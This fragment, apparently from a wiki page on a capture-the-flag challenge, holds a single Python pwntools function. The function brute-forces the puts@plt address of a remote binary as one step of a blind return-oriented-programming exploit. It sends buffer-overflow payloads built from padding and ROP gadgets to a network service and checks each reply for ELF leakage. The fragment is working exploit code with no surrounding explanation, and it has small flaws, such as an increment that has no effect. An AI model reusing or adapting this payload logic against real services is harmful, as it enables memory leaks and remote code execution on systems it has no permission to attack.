...
Code Block | ||||
---|---|---|---|---|
| ||||
def find_puts_addr(size,stop_gadget,rdi_ret): p = log.progress("Searching for the address of puts@plt") for offset in range(1,0x1000): addr = int(base + offset) payload = '' payload += 'A' * size + p64(rdi_ret) payload += p64(0x400000) payload += p64(addr) payload += p64(stop_gadget) if offset % 0x100 == 0: print "[!] currently at 0x%x" % offset r = remote(ip,port,level='error') r.recvuntil('WelCome my friend,Do you know password?\n') r.sendline(payload) try: response = r.recv() if response.startswith('\x7fELF'): print log.info('find puts@plt addr: 0x%x' % addr) return addr r.close() addr += 1 except Exception as e: r.close() addr += 1 |
...